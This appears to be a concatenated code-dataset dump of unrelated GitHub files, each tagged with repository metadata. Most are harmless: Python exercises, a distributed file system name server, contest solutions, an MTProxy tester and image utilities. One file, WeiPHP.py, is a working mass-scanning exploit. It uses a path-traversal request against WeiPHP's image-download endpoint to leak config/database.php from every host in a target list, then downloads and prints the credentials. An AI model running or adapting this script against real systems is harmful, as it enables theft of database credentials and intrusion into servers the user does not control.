u = obj.User(**kwargs["user"])
nk["user"] = u
self.__dict__.update(nk)
| sommalia/moco-wrapper | moco_wrapper/models/objector_models/planning_entry.py | planning_entry.py | py | 465 | python | en | code | 2 | github-code | 90 |
6185444852 | # abs01.py
# 어떠한 숫자에 대해 절대 값으로 만들어 주는 함수 만들기
# 매개 변수 이름은 임의의 이름이어도 된다.
def absolute(n):
if n < 0:
n = -n
return n
su = -5
result = absolute(su)
print(result)
mylist = [2, -4, -7]
newlist = []
for i in mylist:
newlist.append(absolute(i))
print(newlist) # for 문을 통해 새로운 리스트 만들기
newlist2 = [absolute(i) for i in mylist] # list comprehension 방식으로 리스트 만들기
print(newlist2)
print('finished')
| super1947/AICourse | DAY04/abs01.py | abs01.py | py | 527 | python | ko | code | 0 | github-code | 90 |
40390680540 | import socket
from threading import Thread
import random
from time import sleep
BUFFER = 1024
SERVER_WELCOME_PORT = 5000
SERVER_HEARTBEAT_PORT = 5001
CLIENT_MESSAGE_PORT = 5002
SERVER_MESSAGE_PORT = 5003
DELIMITER = "?CON?"
B_DELIMITER = b"?CON?"
# TODO CHANGE
REPLICAS = 2
ERR_MSG = "NO"
B_ERR_MSG = b"NO"
CONFIRM_MSG = "YES"
B_CONFIRM_MSG = b"YES"
# Dict {ServerIP:ServerName}
StorageServers = {}
# Dict {ServerIP:ServerMessageSocket}
StorageServerMessageSockets = {}
ClientIPs = []
class FilesTree:
def __init__(self):
self.root = FolderNode("root", None)
def getFolderByPath(self, path: str):
path = path.split("/")
currentDir = self.root
for directory in path:
if directory != "":
currentDir = currentDir.getFolder(directory)
return currentDir
# Folder
class FolderNode:
def __init__(self, name: str, head):
self.name = name
self.files = []
self.folders = []
self.head = head
def addFolder(self, node):
self.folders.append(node)
node.head = self
def removeFolder(self, node):
self.folders.remove(node)
def getFolder(self, folderName):
for folder in self.folders:
if folder.name == folderName:
return folder
raise Exception
def addFile(self, leafFile):
self.files.append(leafFile)
def removeFile(self, leafFile):
self.files.remove(leafFile)
def removeAllFiles(self):
for file in self.files:
self.files.remove(file)
def isEmpty(self):
return len(self.folders) == 0 and len(self.files) == 0
def __str__(self):
"""
String with all info about folders and files.
"""
if len(self.folders) != 0:
result = "│Folders:"
for folder in self.folders:
result += f"\n└──{folder.name}"
result += "\n\n"
else:
result = "Directory does not contain any folder\n"
if len(self.files) != 0:
result += "│Files:"
for fileInfo in self.files:
result += f"\n└──{fileInfo.fileName}"
else:
result += "Directory does not contain any file"
return result
class FileInfo:
def __init__(self, fileName: str, filePath: str, fileSize: int):
self.fileName = fileName
self.filePath = filePath
self.fileSize = fileSize
self.storageServers = set()
def fileLocation(self):
"""
Return tuple of fileName and filePath
"""
return self.fileName, self.filePath
def addContainer(self, serverIP: str):
self.storageServers.add(serverIP)
def addContainers(self, serverIPs: str):
self.storageServers.update(serverIPs)
def deleteContainer(self, serverIP: str):
self.storageServers.remove(serverIP)
def __str__(self):
"""
To string method
"""
return f"FileName: {self.fileName}, FileSize: {self.fileSize}, FilePath: {self.filePath}\n" \
f"Storage servers IPs: {self.storageServers}"
def encode(self):
"""
Return encoded data about file separated by delimiters
"""
return f"{self.fileName}{DELIMITER}{self.fileSize}{DELIMITER}{self.filePath}".encode()
class StorageDemon:
def __init__(self):
self.serversFiles = dict() # Dict {ServerIP:[FileInfo-s]}.
self.fileDict = dict() # Dict {(fileLocation):FileInfo}
self.fileTree = FilesTree()
def addFileToServer(self, server, fileInfo: FileInfo):
"""
Add file to serverFiles dictionary.
Do not send the file.
"""
if server in self.serversFiles:
self.serversFiles[server].append(fileInfo)
else:
self.serversFiles[server] = [fileInfo]
def delFileFromServer(self, server, fileInfo: FileInfo):
"""
Remove file from serverFiles dictionary.
Do not delete file from the server itself.
"""
listOfFiles = self.serversFiles[server]
listOfFiles.remove(fileInfo)
def isFileExists(self, fileInfo: FileInfo):
"""
Check whether the file exists as record in demon.
"""
try:
_ = self.fileDict[fileInfo.fileLocation()]
return True
except:
return False
def initialize(self, clientSocket: socket.socket):
"""
Send the request to delete all files from storage servers.
Purge all data about files.
Receive information about the storage from servers and send that refactored to the client.
"""
space = 0
for serverSocket in StorageServerMessageSockets.values():
# Let garbage collector manage it
self.serversFiles = dict()
self.fileDict = dict()
self.fileTree = FilesTree()
serverSocket.send(b"init")
data = serverSocket.recv(BUFFER).decode().split(DELIMITER)
serverSpace = int(data[1])
space += serverSpace
realSpace = space // REPLICAS // (2**20) // 8
clientSocket.send(str(realSpace).encode())
def createFile(self, fileInfo: FileInfo):
"""
Send request to create files to the StorageServers.
Add info about the file to the demon.
If file already exist (same fileName and path), replace it with empty copy.
"""
# Send create request only to servers with same file signature if it is exists
if self.isFileExists(fileInfo):
trueFileInfo: FileInfo = self.fileDict[fileInfo.fileLocation()]
# Make it "empty"
trueFileInfo.fileSize = 0
servers = trueFileInfo.storageServers
for server in servers:
print(f"Send CREATE request to storage server with IP:{server}")
StorageServerMessageSockets[server].send(b"create" + B_DELIMITER + fileInfo.encode())
return
# choose random servers to handle request
servers = random.sample(StorageServers.keys(), REPLICAS)
# add list of servers as containers of information about file
fileInfo.addContainers(servers)
# add file in fileTree
self.fileTree.getFolderByPath(fileInfo.filePath).addFile(fileInfo)
# add file to fileDict
self.fileDict[fileInfo.fileLocation()] = fileInfo
for server in servers:
# add file to servers dict-s
self.addFileToServer(server, fileInfo)
print(f"Send CREATE request to storage server with IP:{server}")
# send request
StorageServerMessageSockets[server].send(b"create" + B_DELIMITER + fileInfo.encode())
def readFile(self, fileInfo: FileInfo, clientSocket: socket.socket):
"""
Send file from storage server to client via informing each other about necessary info.
If file does not exist, send error message to client.
"""
if self.isFileExists(fileInfo):
trueFileInfo = self.fileDict[fileInfo.fileLocation()]
server = random.sample(trueFileInfo.storageServers, 1)[0]
clientSocket.send(DELIMITER.join([server, str(trueFileInfo.fileSize)]).encode())
print(f"Send READ to storage server with IP:{server}")
StorageServerMessageSockets[server].send(b"read" + B_DELIMITER + trueFileInfo.encode())
else:
print(f"No such file {fileInfo}")
clientSocket.send(B_ERR_MSG)
def writeFile(self, fileInfo: FileInfo, clientSocket: socket.socket):
"""
Send file from client to storage server via informing each other about necessary info.
Add record about file to demon.
If file is already exists (same fileName and path), replace it with sent file.
"""
# Send write request only to servers with same file signature if it is exists
if self.isFileExists(fileInfo):
trueFileInfo: FileInfo = self.fileDict[fileInfo.fileLocation()]
trueFileInfo.fileSize = fileInfo.fileSize
servers = trueFileInfo.storageServers
for server in servers:
print(f"Send CREATE request to storage server with IP:{server}")
StorageServerMessageSockets[server].send(b"write" + B_DELIMITER + fileInfo.encode())
clientSocket.send(DELIMITER.join(servers).encode())
return
# choose random servers to handle request
servers = random.sample(StorageServers.keys(), REPLICAS)
# add list of servers as containers of information about file
fileInfo.addContainers(servers)
# add file in fileTree
self.fileTree.getFolderByPath(fileInfo.filePath).addFile(fileInfo)
# add file to fileDict
self.fileDict[fileInfo.fileLocation()] = fileInfo
for server in servers:
# add file to servers dict-s
self.addFileToServer(server, fileInfo)
StorageServerMessageSockets[server].send(b"write" + B_DELIMITER + fileInfo.encode())
clientSocket.send(DELIMITER.join(servers).encode())
def delFile(self, fileInfo: FileInfo):
"""
Send file deletion request to StorageServers
Purge info about that file from demon
"""
# If file not exist => do not make anything
if not self.isFileExists(fileInfo):
return
trueFileInfo = self.fileDict[fileInfo.fileLocation()]
self.fileTree.getFolderByPath(trueFileInfo.filePath).removeFile(trueFileInfo)
servers = trueFileInfo.storageServers
for server in servers:
self.delFileFromServer(server, trueFileInfo)
print(f"Send delete request to storage server with IP:{server}")
StorageServerMessageSockets[server].send(b"del" + B_DELIMITER + fileInfo.encode())
del self.fileDict[trueFileInfo.fileLocation()]
def infoFile(self, fileInfo: FileInfo, clientSocket: socket.socket):
"""
Find file and send information about it to client
"""
# In case of such file does not exist, send "File not found"
if not self.isFileExists(fileInfo):
clientSocket.send(b"File not found")
return
# Find file in demon storage
trueFileInfo = self.fileDict[fileInfo.fileLocation()]
# Send info about file
clientSocket.send(trueFileInfo.__str__().encode())
def copyFile(self, fileInfo: FileInfo, newFileInfo: FileInfo, clientSocket: socket.socket):
"""
Send copy request to StorageServers with original file
Add info about new copy to demon
"""
# If file not exist, notify client about it
if not self.isFileExists(fileInfo):
clientSocket.send(B_ERR_MSG)
return
clientSocket.send(B_CONFIRM_MSG)
# choose servers with such file
servers = self.fileDict[fileInfo.fileLocation()].storageServers
newFileInfo.addContainers(servers)
trueFileSize = self.fileDict[fileInfo.fileLocation()].fileSize
newFileInfo.fileSize = trueFileSize
self.fileTree.getFolderByPath(newFileInfo.filePath).addFile(newFileInfo)
self.fileDict[newFileInfo.fileLocation()] = newFileInfo
for server in servers:
self.addFileToServer(server, newFileInfo)
print(f"Send COPY request to storage server with IP:{server}")
StorageServerMessageSockets[server].send(b"copy" + B_DELIMITER + fileInfo.encode() +
B_DELIMITER + newFileInfo.encode())
def moveFile(self, fileInfo: FileInfo, newFileInfo: FileInfo, clientSocket: socket.socket):
"""
Call copy and delete method
(@see copyFile and delFile)
"""
self.copyFile(fileInfo, newFileInfo, clientSocket)
self.delFile(fileInfo)
def openDirectory(self, path: str, clientSocket: socket.socket):
"""
Check whether directory exist.
If directory exists, send B_CONFIRM_MSG to client.
Send B_ERR_MSG otherwise.
"""
try:
self.fileTree.getFolderByPath(path)
clientSocket.send(B_CONFIRM_MSG)
except:
clientSocket.send(B_ERR_MSG)
def readDirectory(self, path, clientSocket: socket.socket):
"""
Send information about files and directories in described folder to client.
If file does not exist, send B_ERR_MSG to client
"""
try:
clientSocket.send(self.fileTree.getFolderByPath(path).__str__().encode())
except:
clientSocket.send(B_ERR_MSG)
def makeDirectory(self, path: str, dirName: str, clientSocket: socket.socket):
"""
Make directory in demon.
If path is not correct, send B_ERR_MSG to client. (B_CONFIRM_MSG if it exist)
"""
try:
headDir = self.fileTree.getFolderByPath(path)
if dirName in [fld.name for fld in headDir.folders]:
pass # IF directory exist => pass
else:
headDir.addFolder(FolderNode(dirName, headDir))
clientSocket.send(B_CONFIRM_MSG)
except:
clientSocket.send(B_ERR_MSG) # Source path does not exist
def delDirectory(self, path):
"""
Delete directory from demon.
Send delete directory request to storage servers.
"""
directory = self.fileTree.getFolderByPath(path)
headDirectory = directory.head
self.recursiveDelete(directory)
headDirectory.removeFolder(directory)
for serverSocket in StorageServerMessageSockets.values():
serverSocket.send(b"deldir" + B_DELIMITER + path.encode())
def recursiveDelete(self, folder: FolderNode):
"""
Delete inside files and folders in specified folder via recursion
"""
for subFolder in folder.folders:
self.recursiveDelete(subFolder)
folder.removeFolder(subFolder)
for file in folder.files:
for storageServer in file.storageServers:
self.delFileFromServer(storageServer, file)
del self.fileDict[file.fileLocation()]
folder.removeAllFiles()
def checkAndDelDirectory(self, path, clientSocket: socket.socket):
"""
If target folder is empty, delete it.
If target folder is not empty, ask user about confirmation and delete it if user agree.
If target folder does not exist, send B_ERR_MSG to client.
"""
try:
if self.fileTree.getFolderByPath(path).isEmpty():
clientSocket.send(b"folderEmpty")
self.delDirectory(path)
else:
clientSocket.send(b"folderNotEmpty")
while True:
response = clientSocket.recv(BUFFER)
if response != b"":
response = response.decode()
if response == "acceptDel":
self.delDirectory(path)
break
elif response == "denyDel":
break
else:
print(f"Unknown response: {response}")
break
except:
clientSocket.send(B_ERR_MSG)
def handleServerClose(self, serverIP: str):
"""
Send all files that was on specified server to another server without that file.
"""
# Get information about all files that were on that server
files = self.serversFiles[serverIP]
print(f"ServerIP of disconnected server: {serverIP}")
for file in files:
print(f"FileInfo: {file}")
# Find available servers to save information
availableStorageServers = [*StorageServers]
print(f"Available SS: {availableStorageServers}")
for SS in file.storageServers:
availableStorageServers.remove(SS)
print(f"Available SS: {availableStorageServers}")
# Delete information about storage server from fileInfo
file.deleteContainer(serverIP)
# Find server with file and server that can receive new replica
serverSender: str = random.sample(file.storageServers, 1)[0]
serverReceiver: str = random.sample(availableStorageServers, 1)[0]
serverSenderSocket: socket.socket = StorageServerMessageSockets[serverSender]
serverReceiverSocket: socket.socket = StorageServerMessageSockets[serverReceiver]
print(f"Replicate from server {serverSender} to server {serverReceiver} of file {file}")
# Send information about file and corresponding opponent server to storage servers
serverSenderSocket.send(b"serverSend" + B_DELIMITER + serverReceiver.encode() + B_DELIMITER + file.encode())
serverReceiverSocket.send(b"serverReceive" + B_DELIMITER + serverSender.encode()
+ B_DELIMITER + file.encode())
self.addFileToServer(serverReceiver, file)
file.addContainer(serverReceiver)
sleep(0.1488)
# Delete server from list of servers in demon
del self.serversFiles[serverIP]
class IPPropagator(Thread):
def __init__(self, sock: socket.socket):
super().__init__(daemon=True)
self.sock = sock
def run(self):
while True:
data, addr = self.sock.recvfrom(BUFFER)
print("New entity trying to find name server.")
self.sock.sendto(b'Hello, new server', addr)
class HeartListener(Thread):
def __init__(self, name: str, sock: socket.socket, ip: str, storageDemon: StorageDemon):
super().__init__(daemon=True)
self.name = name
self.sock = sock
self.ip = ip
self.demon = storageDemon
def close(self):
print(f"Storage server {self.name}(IP:{self.ip}) disconnected.")
self.demon.handleServerClose(self.ip)
del StorageServers[self.ip]
del StorageServerMessageSockets[self.ip]
self.sock.close()
def run(self):
try:
# Receive heartbeat
while self.sock.recv(BUFFER):
sleep(3)
except:
pass
finally:
self.close()
class SSHeartbeatInitializer(Thread):
def __init__(self, sock: socket.socket, storageDemon: StorageDemon):
super().__init__(daemon=True)
self.sock = sock
self.demon = storageDemon
def run(self):
serverID = 1
while True:
con, addr = self.sock.accept()
serverIP = addr[0]
SSName = f"SS_{serverID}"
StorageServers[serverIP] = SSName
print(f"Storage server {SSName}(IP:{serverIP}) connected.")
serverID += 1
HeartListener(SSName, con, serverIP, self.demon).start()
class ClientMessenger(Thread):
def __init__(self, name: str, sock: socket.socket, ip: str, demon: StorageDemon):
super().__init__()
self.name = name
self.sock = sock
self.ip = ip
self.demon = demon
def close(self):
ClientIPs.remove(self.ip)
print(f"Client {self.name}(IP:{self.ip}) disconnected.")
self.sock.close()
def run(self):
try:
while True:
msg = self.sock.recv(BUFFER)
if msg == b'':
sleep(1)
continue
data = msg.decode().split(DELIMITER)
print(f"Get request information {data} from client: {self.name}")
req, meta = data[0], data[1:]
if req == "write":
fileName = meta[0]
fileSize = int(meta[1])
filePath = meta[2]
fileInfo = FileInfo(fileName, filePath, fileSize)
self.demon.writeFile(fileInfo, self.sock)
elif req == "init":
self.demon.initialize(self.sock)
elif req == "del":
fileName = meta[0]
filePath = meta[1]
fileInfo = FileInfo(fileName, filePath, 0)
self.demon.delFile(fileInfo)
elif req == "create":
fileName = meta[0]
filePath = meta[1]
fileInfo = FileInfo(fileName, filePath, 0)
self.demon.createFile(fileInfo)
elif req == "read":
fileName = meta[0]
filePath = meta[1]
fileInfo = FileInfo(fileName, filePath, 0)
self.demon.readFile(fileInfo, self.sock)
pass
elif req == "info":
fileName = meta[0]
filePath = meta[1]
fileInfo = FileInfo(fileName, filePath, 0)
self.demon.infoFile(fileInfo, self.sock)
elif req == "copy":
fileName = meta[0]
filePath = meta[1]
newFileName = meta[2]
newFilePath = meta[3]
fileInfo = FileInfo(fileName, filePath, 0)
newFileInfo = FileInfo(newFileName, newFilePath, 0)
self.demon.copyFile(fileInfo, newFileInfo, self.sock)
elif req == "move":
fileName = meta[0]
filePath = meta[1]
newFileName = meta[2]
newFilePath = meta[3]
fileInfo = FileInfo(fileName, filePath, 0)
newFileInfo = FileInfo(newFileName, newFilePath, 0)
self.demon.moveFile(fileInfo, newFileInfo, self.sock)
elif req == "ls":
path = meta[0]
self.demon.readDirectory(path, self.sock)
elif req == "mkdir":
dirName = meta[0]
path = meta[1]
self.demon.makeDirectory(path, dirName, self.sock)
elif req == "del_dir":
path = meta[0]
self.demon.checkAndDelDirectory(path=path, clientSocket=self.sock)
elif req == "cd":
path = meta[0]
self.demon.openDirectory(path, self.sock)
else:
print(f"Unknown request: {req}")
continue
except:
pass
finally:
self.close()
class ClientWelcome(Thread):
def __init__(self, sock: socket.socket, demon: StorageDemon):
super().__init__(daemon=True)
self.sock = sock
self.demon = demon
def run(self):
clientID = 1
while True:
con, addr = self.sock.accept()
clientIP = addr[0]
ClientIPs.append(clientIP)
clientName = f"CLIENT_{clientID}"
print(f"Client {clientName}(IP:{clientIP}) connected.")
clientID += 1
ClientMessenger(clientName, con, clientIP, self.demon).start()
class ServerWelcome(Thread):
def __init__(self, sock: socket.socket):
super().__init__(daemon=True)
self.sock = sock
def run(self):
while True:
con, addr = self.sock.accept()
serverIP = addr[0]
serverName = StorageServers[serverIP]
StorageServerMessageSockets[serverIP] = con
print(f"Storage server {serverName}(IP:{serverIP}) establish messaging connection.")
def main():
# UDP socket to meet new connections and provide them IP
IPPropagationSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
IPPropagationSocket.bind(("", SERVER_WELCOME_PORT))
IPPropagator(IPPropagationSocket).start()
# Initialize storage demon
demon = StorageDemon()
# TCP welcome socket for initializing Storage Servers heartbeats
storageServerHeartbeatInitializer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
storageServerHeartbeatInitializer.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
storageServerHeartbeatInitializer.bind(('', SERVER_HEARTBEAT_PORT)) # Bind to specified port
storageServerHeartbeatInitializer.listen() # Enable connections
SSHeartbeatInitializer(storageServerHeartbeatInitializer, demon).start()
# TCP welcome socket for message data about requests with Storage Servers
storageServerWelcomeSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
storageServerWelcomeSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
storageServerWelcomeSocket.bind(('', SERVER_MESSAGE_PORT))
storageServerWelcomeSocket.listen()
ServerWelcome(storageServerWelcomeSocket).start()
# TCP socket to initiate connections with Clients
clientWelcomeSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientWelcomeSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
clientWelcomeSocket.bind(("", CLIENT_MESSAGE_PORT))
clientWelcomeSocket.listen()
ClientWelcome(clientWelcomeSocket, demon).start()
while True:
pass
if __name__ == "__main__":
main()
| Leosimetti/DS-project-2-Distributed-file-system | Nameserver/NameServer.py | NameServer.py | py | 25,524 | python | en | code | 0 | github-code | 90 |
18055231409 | N, A, B = map(int, input().split())
S = input()
all = 0
foreign = 0
for i in range(len(S)):
if S[i] == 'a' and all < A + B:
print('Yes')
all += 1
continue
if S[i] == 'b' and all < A + B and foreign < B:
print('Yes')
all += 1
foreign += 1
continue
print('No') | Aasthaengg/IBMdataset | Python_codes/p03971/s991625010.py | s991625010.py | py | 293 | python | en | code | 0 | github-code | 90 |
19597451449 | import requests
import random
import re
def title():
print('+------------------------------------------')
print('+ \033[31m公众号:深夜笔记本 \033[0m')
print('+ \033[34mVersion: weiphp \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mFile >>> ip.txt \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
upload_url = target_url + "/public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
}
data = {
"1":1
}
try:
response = requests.post(url=upload_url, headers=headers, data=data, timeout=20)
if response.status_code == 200:
print("\033[32m[o] 成功将 database.php文件 写入Pictrue表中\033[0m")
else:
print("\033[31m[x] 漏洞利用失败 \033[0m")
except:
print("\033[31m[x] 漏洞利用失败 \033[0m")
def POC_2(target_url):
vnln_url = target_url + "/public/index.php/home/file/user_pics"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
}
try:
response = requests.get(url=vnln_url, headers=headers).text
href = re.findall(r'<img src="(.*?)"', response)
for i in href:
print("\033[32m[o] 得到敏感文件url:{}\033[0m".format(i))
data = requests.get(url=i, headers=headers)
path = str(random.randint(1,999)) + '.php'
with open(path, 'wb') as f:
f.write(data.content)
print("\033[32m[o] 成功下载文件为:{}\033[0m".format(path))
print("\033[32m[o] 文件内容为:\n\033[0m{}".format(data.text))
except:
print("\033[31m[x] 获取文件名失败 \033[0m")
def Scan(file_name):
with open(file_name, "r", encoding='utf8') as scan_url:
for url in scan_url:
if url[:4] != "http":
url = "http://" + url
url = url.strip('\n')
try:
POC_1(url)
POC_2(url)
except Exception as e:
print("\033[31m[x] 请求报错 \033[0m".format(e))
continue
if __name__ == '__main__':
title()
file_name = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m"))
Scan(file_name) | wushigudan/poc | WeiPHP.py | WeiPHP.py | py | 2,845 | python | en | code | 14 | github-code | 90 |
73562705898 | from os import urandom
from struct import pack, unpack_from
from time import time
import socket
import hashlib
import mtproto
from ctr_socket import CTRSocket
from tls_socket import TLSSocket
def connect(dc_id, ip, port, secret, timeout):
protocol = 0xefefefef
obfs = len(secret) > 32
proxy_real_secret = bytearray.fromhex(secret if not obfs else secret[2:34])
proxy_domain = bytearray.fromhex(secret[34:]) if obfs and secret[:2] == "ee" else None
proxy_padded = len(secret) == 34 and secret[:2] == "dd"
ws = None
if proxy_padded:
protocol = 0xdddddddd
if proxy_domain:
ws = TLSSocket(proxy_domain, proxy_real_secret)
s = CTRSocket(sock=ws, timeout=timeout)
s.connect((ip, port))
# now we established a connection...
start = time()
session = mtproto.Session(s, using_proxy=True, padded=proxy_padded)
res = session.get_server_public_key_fingerprint()
end = time()
return ((end - start) * 1000, res), None
def test_mtproxy(dc_id, ip, port, secret, timeout=5.0):
retry = 3
while True:
try:
return connect(dc_id, ip, port, secret, timeout)
except Exception as e:
if retry > 0:
retry -= 1
else:
return None, e
def test_direct(ip='149.154.167.40', port=443, padded=False, intermediate=False):
try:
s = socket.socket()
s.connect((ip, port))
session = mtproto.Session(s, padded=padded, intermediate=intermediate)
start = time()
res = session.get_server_public_key_fingerprint()
end = time()
return ((end - start) * 1000, res), None
except Exception as e:
return None, e
| chinuts/tg-mtproxy-test | main.py | main.py | py | 1,712 | python | en | code | 1 | github-code | 90 |
19568964272 | import numpy
def Optimal_BST(p,q,n):
e=numpy.zeros((n+2,n+1)) #let e[1...n+1,0...n]
w=numpy.zeros((n+2,n+1)) #let w[1...n+1,0...n]
root=numpy.zeros((n+1,n+1)) #let root[1...n,1...n]
#initialization
for i in range(1,n+2):
e[i][i-1]=q[i-1]
w[i][i-1]=q[i-1]
#recursive formula
for l in range(1,n+1):
for i in range(1,n-l+2):
j=i+l-1
e[i][j]=10000000 #infinite
w[i][j]=round(w[i][j-1]+p[j]+q[j],2)
#find root[i][j]
for r in range(i,j+1):
t=e[i][r-1]+e[r+1][j]+w[i][j]
if t<e[i][j]:
e[i][j]=round(t, 2)
root[i][j]=r
return e,root,w
try:
p=[0,0.15,0.1,0.05,0.1,0.2]
q=[0.05,0.1,0.05,0.05,0.05,0.1]
n=5
e,root,w=Optimal_BST(p,q,n)
print('\n')
print("e table:")
for i in range(n+2):
print(e[i])
print('\n')
print("w table:")
for i in range(n+2):
print(w[i])
print('\n')
print("root table:")
for i in range(1,n+1):
print(root[i])
except Exception as e:
print(str(e)) | leo735262/Python | ALG/Optimal_BST.py | Optimal_BST.py | py | 1,143 | python | en | code | 0 | github-code | 90 |
27328462875 | #!/usr/bin/env python
import bernhard
import os, time
from datetime import datetime
from sys import argv
from socket import gethostname
HOST = gethostname()
SERVER = argv[1]
STATEFILE = '/var/backups/local.backup.timestamp'
c = bernhard.Client(SERVER)
event = {}
event['host'] = HOST
event['service'] = 'last successful backup time'
event['ttl'] = 7200
event['tags'] = ['backups']
if os.path.exists(STATEFILE):
lastbackup = os.stat(STATEFILE).st_mtime
timediff = time.time() - lastbackup
if timediff < 0:
event['state'] = 'critical'
description = 'in the future, this is wrong!'
elif 90000 < timediff < 180000: # 1d+1h, resp. 2d+2h
event['state'] = 'warning'
description = 'older than 1 day'
elif timediff > 180000:
event['state'] = 'critical'
description = 'older than 2 days'
else:
event['state'] = 'ok'
description = 'within last 24h'
event['description'] = "%s: %s" % (description, datetime.utcfromtimestamp(lastbackup).strftime("%Y-%m-%d %H:%m:%S"))
else:
event['description'] = 'no statefile found'
event['state'] = 'critical'
c.send(event)
| c2corg/infrastructure | puppetmaster/site-modules/c2cinfra/files/backup/last_backup.py | last_backup.py | py | 1,110 | python | en | code | 2 | github-code | 90 |
8531654857 | def fact(n):
result=1
if(n<0):
print("Can't find factorial of a negative number")
elif(n==0):
print("1",end=" ");
else:
for i in range(2,n+1):
result*=i
return result
# a =fact(99999)
# print(a)
| yashu762001/Python-Tutorial | General/Factorial.py | Factorial.py | py | 254 | python | en | code | 1 | github-code | 90 |
18011677619 | from collections import defaultdict
def input_as_int():
return list(map(int,input().split()))
def get_comb(n): # n C n まで
fac = get_fact(n)
com = [["error" for _ in range(n+1)] for _ in range (n + 1)]
for i in range(n + 1):
for j in range(i + 1):
if i >= j:
com[i][j] = fac[i] // (fac[i-j] * fac[j])
return com
def get_fact(n):
temp = 1
fac = [1]
for i in range(1, n + 1):
temp *= i
fac.append(temp)
return fac
N,A,B = input_as_int()
Vs = input_as_int()
Vs.sort(reverse= True)
nums = defaultdict(lambda :0)
kose = defaultdict(lambda :0)
com = get_comb(N)
for v in Vs:
nums[v] += 1
total = 0
for i in range(A):
total += Vs[i]
kose[Vs[i]] += 1
av = total / A
i = A
ans = 0
while True:
temp = 1
for k,v in kose.items():
n = nums[k]
temp *= com[n][v]
ans += temp
if i ==B or Vs[i] != Vs[0] :
break
else:
kose[Vs[i]] +=1
i += 1
print(av)
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p03776/s020738595.py | s020738595.py | py | 1,016 | python | en | code | 0 | github-code | 90 |
73632996138 | from LinkedList import LinkedList
def del_mid_node(n):
n.next = n.next.next
n.value = n.next.next.value
ll = LinkedList()
ll.add_multiple([1, 2, 3, 4])
middle_node = ll.add(5)
ll.add_multiple([7, 8, 9])
print(ll)
del_mid_node(middle_node)
print(ll)
| tech-cow/big4 | algorithm_AKA_谷歌我来了/cc150/chapter2_linked_list/2_3_delete_mid_node.py | 2_3_delete_mid_node.py | py | 261 | python | en | code | 7 | github-code | 90 |
18001428719 | def main():
import sys
input = sys.stdin.readline
n, t = list(map(int, input().rstrip('\n').split()))
T = list(map(int, input().rstrip('\n').split()))
cnt = 0
for i in range(1, n):
cnt += min(T[i] - T[i-1], t)
print(cnt + t)
if __name__ == '__main__':
main()
| Aasthaengg/IBMdataset | Python_codes/p03733/s329315507.py | s329315507.py | py | 301 | python | en | code | 0 | github-code | 90 |
16989450562 | import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
from skimage import color
def load_demo_image():
im = color.rgb2lab(Image.open('../object_recognition/img/Patern_test.jpg')) / 100.0
return im[..., 0]
def zca_whitening(inputs):
sigma = np.dot(inputs, inputs.T) / inputs.shape[1] # Correlation matrix
U, S, V = np.linalg.svd(sigma) # Singular Value Decomposition
epsilon = 0.1 # Whitening constant, it prevents division by zero
ZCAMatrix = np.dot(np.dot(U, np.diag(1.0 / np.sqrt(np.diag(S) + epsilon))), U.T) # ZCA Whitening matrix
return np.dot(ZCAMatrix, inputs), ZCAMatrix # Data whitening
def scale_to_unit_interval(ndar, eps=1e-8):
""" Scales all values in the ndarray ndar to be between 0 and 1 """
ndar = ndar.copy()
ndar -= ndar.min()
ndar *= 1.0 / (ndar.max() + eps)
return ndar
def tile_raster_images(X, img_shape, tile_shape, tile_spacing=(0, 0),
scale_rows_to_unit_interval=True,
output_pixel_vals=True):
"""
Transform an array with one flattened image per row, into an array in
which images are reshaped and layed out like tiles on a floor.
This function is useful for visualizing datasets whose rows are images,
and also columns of matrices for transforming those rows
(such as the first layer of a neural net).
:type X: a 2-D ndarray or a tuple of 4 channels, elements of which can
be 2-D ndarrays or None;
:param X: a 2-D array in which every row is a flattened image.
:type img_shape: tuple; (height, width)
:param img_shape: the original shape of each image
:type tile_shape: tuple; (rows, cols)
:param tile_shape: the number of images to tile (rows, cols)
:param output_pixel_vals: if output should be pixel values (i.e. int8
values) or floats
:param scale_rows_to_unit_interval: if the values need to be scaled before
being plotted to [0,1] or not
:returns: array suitable for viewing as an image.
(See:`Image.fromarray`.)
:rtype: a 2-d array with same dtype as X.
"""
assert len(tile_shape) == 2
assert len(tile_spacing) == 2
# The expression below can be re-written in a more C style as
# follows :
#
# out_shape = [0,0]
# out_shape[0] = (img_shape[0]+tile_spacing[0])*tile_shape[0] -
# tile_spacing[0]
# out_shape[1] = (img_shape[1]+tile_spacing[1])*tile_shape[1] -
# tile_spacing[1]
out_shape = [
(ishp + tsp) * tshp - tsp
for ishp, tshp, tsp in zip(X[0].shape[:2], tile_shape, tile_spacing)
]
if len(X[0].shape)>2:
out_shape.append(X[0].shape[2])
if True:
# if we are dealing with only one channel
H, W = X[0].shape[:2]
Hs, Ws = tile_spacing
# generate a matrix to store the output
dt = X.dtype
if output_pixel_vals:
dt = 'uint8'
out_array = np.zeros(out_shape, dtype=dt)
for tile_row in range(tile_shape[0]):
for tile_col in range(tile_shape[1]):
if tile_row * tile_shape[1] + tile_col < X.shape[0]:
this_img = X[tile_row * tile_shape[1] + tile_col]
c = 1
if output_pixel_vals:
c = 255
out_array[
tile_row * (H + Hs): tile_row * (H + Hs) + H,
tile_col * (W + Ws): tile_col * (W + Ws) + W,:
] = this_img*c
return out_array
def show_image(img, title=None, bw=False, per_row=2):
cmap = 'viridis' if not bw else 'gray'
if isinstance(img, list):
total = len(img)
plt.title(title)
per_row = per_row
cols = np.ceil(total / per_row)
for id, k in enumerate(img):
